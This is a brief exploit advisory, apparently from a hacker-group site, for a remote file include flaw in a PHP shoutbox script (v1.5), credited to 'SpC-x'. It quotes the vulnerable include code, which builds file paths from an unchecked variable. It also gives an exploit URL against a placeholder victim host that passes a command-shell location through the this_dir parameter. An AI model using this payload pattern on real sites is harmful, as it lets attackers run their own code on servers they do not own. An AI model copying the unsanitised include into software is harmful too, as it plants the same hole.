SaVSaK.CoM | SpC-x - The_BeKiR |

S H O U T B O X (v1.5) Version - Remote File Include Vulnerability

Risk : High

Class: Remote

Script : S H O U T B O X

Credits : SpC-x

Thanks : The_BeKiR - Ejder - FasTBoY - ERNE - RMx

Code :

$this_dir = str_replace('\\', '/', dirname(FILE));

include("$this_dir/config.inc.php");

if(!isset($language)) $language = 'en';

include("$this_dir/lang_$language.inc");

include("$this_dir/smilies.inc");

Vulnerable :

http://www.victim.com/S H O U T B O X/shoutbox.inc.php?this_dir=Command-Shell